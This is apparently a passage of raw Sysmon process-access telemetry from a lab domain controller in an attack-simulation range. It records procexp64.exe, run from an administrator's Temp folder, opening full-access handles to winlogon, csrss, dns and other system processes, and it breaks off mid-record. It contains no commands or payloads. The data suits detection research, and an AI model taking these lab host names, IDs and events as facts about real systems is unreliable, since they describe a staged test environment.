15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790375Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790374Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790373Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790372Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790371Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790370Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790369Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790368Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790367Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790366Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790365Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790364Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790363Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790362Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790361Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790360Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790359Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790358Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790357Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790356Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790355Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790354Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790353Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790352Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790351Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790350Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790349Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000790348Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:41.376{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+1617|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+71d9d|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a1517|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SY